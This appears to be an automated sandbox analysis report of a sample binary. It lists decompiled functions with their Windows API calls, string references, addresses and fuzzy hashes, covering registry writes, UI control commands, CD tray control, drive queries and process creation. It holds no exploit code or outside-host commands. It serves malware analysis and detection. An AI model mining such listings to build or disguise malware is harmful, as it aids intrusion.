_wcslen.LIBCMT ref: 0099D0CF
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0099D112
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0099D221
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0099D2AD
RegCloseKey.ADVAPI32(?), ref: 0099D2E1
RegCloseKey.ADVAPI32(00000000), ref: 0099D2EE
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0099D3C0

Strings

REG_MULTI_SZ, xrefs: 0099D155
REG_DWORD, xrefs: 0099D264
REG_SZ, xrefs: 0099D0A4
REG_EXPAND_SZ, xrefs: 0099D02D
REG_BINARY, xrefs: 0099D373
REG_QWORD, xrefs: 0099D323

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: a2b93885275f2d50109f07fda071f2fd301fbc5e3ce2dcecfdf8725c3e076758
Instruction ID: af78d3bcc6da4387760b51339fe5dc6e21ebb07c6f19cb3a870c3440e0f6ab52
Opcode Fuzzy Hash: a2b93885275f2d50109f07fda071f2fd301fbc5e3ce2dcecfdf8725c3e076758
Instruction Fuzzy Hash: 8D125A756042059FDB14DF18C885B6ABBE6EF89714F04885DF85A9B3A2CB31FD41CB81

Function 009A13BA Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009A1462
_wcslen.LIBCMT ref: 009A149D
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 009A14F0
_wcslen.LIBCMT ref: 009A1526
_wcslen.LIBCMT ref: 009A15A2
_wcslen.LIBCMT ref: 009A161D

Part of subcall function 0092FD52: _wcslen.LIBCMT ref: 0092FD5D

Part of subcall function 00973535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00973547

Strings

GETTOTALCOUNT, xrefs: 009A148E, 009A14B3
SELECT, xrefs: 009A17AD
EXISTS, xrefs: 009A1618, 009A1633
CHECK, xrefs: 009A1521, 009A153C
GETSELECTED, xrefs: 009A16EA
GETTEXT, xrefs: 009A1733
EXPAND, xrefs: 009A1694
UNCHECK, xrefs: 009A17DA
GETITEMCOUNT, xrefs: 009A16BA
ISCHECKED, xrefs: 009A177D
COLLAPSE, xrefs: 009A159D, 009A15B8

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: a17506206167c62fb1ec4bd6bfadc55fbfb60db2744d2ecb3b3fa7d9b369090d
Instruction ID: c0e1f1bfc2a4a3d6468781ad4b2c048922f406f623601be4b411cfb5ad325d74
Opcode Fuzzy Hash: a17506206167c62fb1ec4bd6bfadc55fbfb60db2744d2ecb3b3fa7d9b369090d
Instruction Fuzzy Hash: E7E19C366083018FC714EF28C450A6AB7E6BFDA314F14895DF8969B3A2DB34ED45CB81

Function 0099D3F8 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0099C10E,?,?), ref: 0099D415
_wcslen.LIBCMT ref: 0099D451
_wcslen.LIBCMT ref: 0099D4C8
_wcslen.LIBCMT ref: 0099D4FE
_wcslen.LIBCMT ref: 0099D559
_wcslen.LIBCMT ref: 0099D58F
_wcslen.LIBCMT ref: 0099D5DF

Strings

HKEY_CURRENT_CONFIG, xrefs: 0099D5D9, 0099D5DE
HKU, xrefs: 0099D650
HKCR, xrefs: 0099D589, 0099D58E
HKLM, xrefs: 0099D4F8, 0099D4FD
HKCC, xrefs: 0099D60C
HKEY_LOCAL_MACHINE, xrefs: 0099D4C2, 0099D4C7
HKCU, xrefs: 0099D62E
HKEY_CURRENT_USER, xrefs: 0099D61D
HKEY_CLASSES_ROOT, xrefs: 0099D553, 0099D558
HKEY_USERS, xrefs: 0099D63F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 1be6cc09fc6c406503b9b54ef0f39a0786fdbf38886d9d1e36745ab3b5949043
Instruction ID: c504936d3c938d53c49d4a4a814beae4f76f696d62b89c94bc8525fcb5b4a5b6
Opcode Fuzzy Hash: 1be6cc09fc6c406503b9b54ef0f39a0786fdbf38886d9d1e36745ab3b5949043
Instruction Fuzzy Hash: 1B712A3260222A8BCF209F3CCD806FF33A9AFA1754F260525F8559B299EB35DD44C791

Function 009A8D97 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009A8DB5
_wcslen.LIBCMT ref: 009A8DC9
_wcslen.LIBCMT ref: 009A8DEC
_wcslen.LIBCMT ref: 009A8E0F
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 009A8E4D
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,009A6691), ref: 009A8EA9
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009A8EE2
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 009A8F25
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 009A8F5C
FreeLibrary.KERNEL32(?), ref: 009A8F68
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 009A8F78
DestroyIcon.USER32(?,?,?,?,?,009A6691), ref: 009A8F87
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 009A8FA4
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 009A8FB0

Strings

.icl, xrefs: 009A8DC3
.dll, xrefs: 009A8E06
.exe, xrefs: 009A8DE3

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: fe4f4e4ec8c527df400185be1bbb21f7827af5d5d4c48de7afc11440afdb2b39
Instruction ID: 9a00e63431fcf350c03be69d800a8e9e4f5b98f4c2b0b443b7cd6ef9eddf90ee
Opcode Fuzzy Hash: fe4f4e4ec8c527df400185be1bbb21f7827af5d5d4c48de7afc11440afdb2b39
Instruction Fuzzy Hash: 2761CE71A10219BEEB14AF64CC45BBF77ACBF0AB10F208506F815E61D1DB74A990DBE0

Function 009848BE Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0098493D
_wcslen.LIBCMT ref: 00984948
_wcslen.LIBCMT ref: 0098499F
_wcslen.LIBCMT ref: 009849DD
GetDriveTypeW.KERNEL32(?), ref: 00984A1B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00984A63
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00984A9E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00984ACC

Strings

close cd wait, xrefs: 00984AB7
wait, xrefs: 00984A89
open , xrefs: 00984A2A
open, xrefs: 00984999, 0098499E
type cdaudio alias cd wait, xrefs: 00984A46
set cd door , xrefs: 00984A6D
close, xrefs: 00984943, 0098495D
closed, xrefs: 0098494D, 00984972, 0098498B, 009849C3, 009849DC

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: SendString_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1839972693-4113822522
Opcode ID: 00e32f54d1be1b0cc6df3ac983c6cd6236b8b2f35af9f80147b2d7bd02928a10
Instruction ID: c1dbcceb155225cddd90ffd620cec679b3cec1600b18ea1b8b8e07c0dcc615c8
Opcode Fuzzy Hash: 00e32f54d1be1b0cc6df3ac983c6cd6236b8b2f35af9f80147b2d7bd02928a10
Instruction Fuzzy Hash: 1671DE726082168FC710EF34C880AABB7E8EF94758F50492DF89697361EB31DD85CB91

Function 00976382 Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00976395
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009763A7
SetWindowTextW.USER32(?,?), ref: 009763BE
GetDlgItem.USER32(?,000003EA), ref: 009763D3
SetWindowTextW.USER32(00000000,?), ref: 009763D9
GetDlgItem.USER32(?,000003E9), ref: 009763E9
SetWindowTextW.USER32(00000000,?), ref: 009763EF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00976410
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0097642A
GetWindowRect.USER32(?,?), ref: 00976433
_wcslen.LIBCMT ref: 0097649A
SetWindowTextW.USER32(?,?), ref: 009764D6
GetDesktopWindow.USER32 ref: 009764DC
GetWindowRect.USER32(00000000), ref: 009764E3
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 0097653A
GetClientRect.USER32(?,?), ref: 00976547
PostMessageW.USER32(?,00000005,00000000,?), ref: 0097656C
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00976596

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 0b7282753b7d3c88593c2edc7daa581300312e554b3f3458ae0499615375c5bd
Instruction ID: 12a558ae5b2711e7240cfd0adf4310e3b580bd3430eb76f92bb7f7639c52ebc0
Opcode Fuzzy Hash: 0b7282753b7d3c88593c2edc7daa581300312e554b3f3458ae0499615375c5bd
Instruction Fuzzy Hash: C4717F72900B05EFDB20DFA8CE45BAEBBF9FF48704F104918E58AA25A0D775E944DB50

Function 0099086B Relevance: 27.1, APIs: 18, Instructions: 128COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00990884
LoadCursorW.USER32(00000000,00007F8A), ref: 0099088F
LoadCursorW.USER32(00000000,00007F00), ref: 0099089A
LoadCursorW.USER32(00000000,00007F03), ref: 009908A5
LoadCursorW.USER32(00000000,00007F8B), ref: 009908B0
LoadCursorW.USER32(00000000,00007F01), ref: 009908BB
LoadCursorW.USER32(00000000,00007F81), ref: 009908C6
LoadCursorW.USER32(00000000,00007F88), ref: 009908D1
LoadCursorW.USER32(00000000,00007F80), ref: 009908DC
LoadCursorW.USER32(00000000,00007F86), ref: 009908E7
LoadCursorW.USER32(00000000,00007F83), ref: 009908F2
LoadCursorW.USER32(00000000,00007F85), ref: 009908FD
LoadCursorW.USER32(00000000,00007F82), ref: 00990908
LoadCursorW.USER32(00000000,00007F84), ref: 00990913
LoadCursorW.USER32(00000000,00007F04), ref: 0099091E
LoadCursorW.USER32(00000000,00007F02), ref: 00990929
GetCursorInfo.USER32(?), ref: 00990939
GetLastError.KERNEL32 ref: 0099097B

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 98c4eea8ab22e32c4221cfe29d52531e6dbba8e49f08b5b24df4eb76b4e85ee4
Instruction ID: e39446ab0469d821ca846cbe422f082a0e537bf74d1ff837868b1b4544c0d568
Opcode Fuzzy Hash: 98c4eea8ab22e32c4221cfe29d52531e6dbba8e49f08b5b24df4eb76b4e85ee4
Instruction Fuzzy Hash: CE4152B0D483196EDB109FBA8C8986EBFE8FF44754B50452AE11DE7281DA789801CF91

Function 00930436 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00930436

Part of subcall function 0093045D: InitializeCriticalSectionAndSpinCount.KERNEL32(009E170C,00000FA0,B36F34C4,?,?,?,?,00952733,000000FF), ref: 0093048C
Part of subcall function 0093045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00952733,000000FF), ref: 00930497
Part of subcall function 0093045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00952733,000000FF), ref: 009304A8
Part of subcall function 0093045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009304BE
Part of subcall function 0093045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009304CC
Part of subcall function 0093045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009304DA
Part of subcall function 0093045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00930505
Part of subcall function 0093045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00930510

___scrt_fastfail.LIBCMT ref: 00930457

Part of subcall function 00930413: __onexit.LIBCMT ref: 00930419

Strings

SleepConditionVariableCS, xrefs: 009304C4
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00930492
WakeAllConditionVariable, xrefs: 009304D2
InitializeConditionVariable, xrefs: 009304B8
kernel32.dll, xrefs: 009304A3

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: b777b96d800fd1589c01ac0bda4b39e2030937ae6b9a4aeaac6f0db2e25305dd
Instruction ID: a9932c7a2cf4d41398b4e966df68938da007a4e0ffde6973fc788d9c7710dee9
Opcode Fuzzy Hash: b777b96d800fd1589c01ac0bda4b39e2030937ae6b9a4aeaac6f0db2e25305dd
Instruction Fuzzy Hash: 61216D32A5E3046FD7246BA5AC1ABAA37D8EFC5F65F000125F902D76D0DF709C008E91

Function 00973A43 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00973AD9
_wcslen.LIBCMT ref: 00973B44

Strings

TEXT, xrefs: 00973DC8
CLASS, xrefs: 00973AD4, 00973AF1
REGEXPCLASS, xrefs: 00973BA1, 00973BB2
INSTANCE, xrefs: 00973D9F
CLASSNN, xrefs: 00973B3F, 00973B50
NAME, xrefs: 00973C81, 00973C92

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 176396367-1603158881
Opcode ID: 6b8e42e6f3146d62f1dbc74f44c821b08b1fe93319e40038b47b85816590868b
Instruction ID: dfb853c4dd080532f2bf30cf8afe75965323ceb278c7a5f6b9dfc74c78d2a367
Opcode Fuzzy Hash: 6b8e42e6f3146d62f1dbc74f44c821b08b1fe93319e40038b47b85816590868b
Instruction Fuzzy Hash: 21E1E733A04516ABCB249F74C8417FDFBB5BF54750F14C12AE49AE7250DB30AE85A790

Function 00984F05 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,009ADCD0), ref: 00984F6C
_wcslen.LIBCMT ref: 00984F80
_wcslen.LIBCMT ref: 00984FDE
_wcslen.LIBCMT ref: 00985039
_wcslen.LIBCMT ref: 00985084
_wcslen.LIBCMT ref: 009850EC

Part of subcall function 0092FD52: _wcslen.LIBCMT ref: 0092FD5D

GetDriveTypeW.KERNEL32(?,009D7C10,00000061), ref: 00985188

Strings

all, xrefs: 00984F76, 00984F7B
removable, xrefs: 0098502F, 00985034
ramdisk, xrefs: 00985136
network, xrefs: 009850E2, 009850E7
unknown, xrefs: 0098514D
fixed, xrefs: 0098507A, 0098507F
cdrom, xrefs: 00984FD4, 00984FD9

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 05b00a269d19b9bc141ea4c371e68d19c5e7ffbb2ed3e129233256c41635c6a4
Instruction ID: 795fe1d10b9e5fa3257c089519ab6a3cfdacba1839c915bd3e613b9cd6810ebe
Opcode Fuzzy Hash: 05b00a269d19b9bc141ea4c371e68d19c5e7ffbb2ed3e129233256c41635c6a4
Instruction Fuzzy Hash: 6CB1B2316087029FC710EF28C890A6AB7E9AFD5764F51491DF596C7391EB34D888CB92

Function 0099BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0099BBF8
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0099BC10
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0099BC34
_wcslen.LIBCMT ref: 0099BC60
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0099BC74
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0099BC96
_wcslen.LIBCMT ref: 0099BD92

Part of subcall function 00980F4E: GetStdHandle.KERNEL32(000000F6), ref: 00980F6D

_wcslen.LIBCMT ref: 0099BDAB
_wcslen.LIBCMT ref: 0099BDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0099BE16
GetLastError.KERNEL32(00000000), ref: 0099BE67
CloseHandle.KERNEL32(?), ref: 0099BE99
CloseHandle.KERNEL32(00000000), ref: 0099BEAA
CloseHandle.KERNEL32(00000000), ref: 0099BEBC
CloseHandle.KERNEL32(00000000), ref: 0099BECE
CloseHandle.KERNEL32(?), ref: 0099BF43

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: cad3e1414b23468e208a24491f98caeae50dfbbb3e608780e109d8c7e62f93c3
Instruction ID: b2263f164c9783dce68c90234fb5f4a943b85ad448c4dfb6dcd74ac247ca5905
Opcode Fuzzy Hash: cad3e1414b23468e208a24491f98caeae50dfbbb3e608780e109d8c7e62f93c3
Instruction Fuzzy Hash: 62F1C1716083049FCB14EF28D991B6ABBE5BFC5314F14895DF8894B2A2DB34EC45CB92

Function 00994A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,009ADCD0), ref: 00994B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00994B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,009ADCD0), ref: 00994B4F
FreeLibrary.KERNEL32(00000000,?,009ADCD0), ref: 00994B9B
StringFromGUID2.OLE32(?,?,00000028,?,009ADCD0), ref: 00994C05
SysFreeString.OLEAUT32(00000009), ref: 00994CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00994D25
SysFreeString.OLEAUT32(?), ref: 00994D4F

Strings

GetModuleHandleExW, xrefs: 00994B24
kernel32.dll, xrefs: 00994B13

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: fea30d48ec858bded978a2b5b098d09d290cf64f38eda10e3ed1e729deed6976
Instruction ID: f18ff754575d20e128dbb69349d0a64dd09a6257131e3df116bc38c80ce9030e
Opcode Fuzzy Hash: fea30d48ec858bded978a2b5b098d09d290cf64f38eda10e3ed1e729deed6976
Instruction Fuzzy Hash: CC121B75A00119EFDF15CF98C884EAEB7B9FF89314F148098E9499B251D731ED46CBA0

Function 0091381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(009E29C0), ref: 00953F72
GetMenuItemCount.USER32(009E29C0), ref: 00954022
GetCursorPos.USER32(?), ref: 00954066
SetForegroundWindow.USER32(00000000), ref: 0095406F
TrackPopupMenuEx.USER32(009E29C0,00000000,?,00000000,00000000,00000000), ref: 00954082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0095408E

Strings

0, xrefs: 0091382D

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

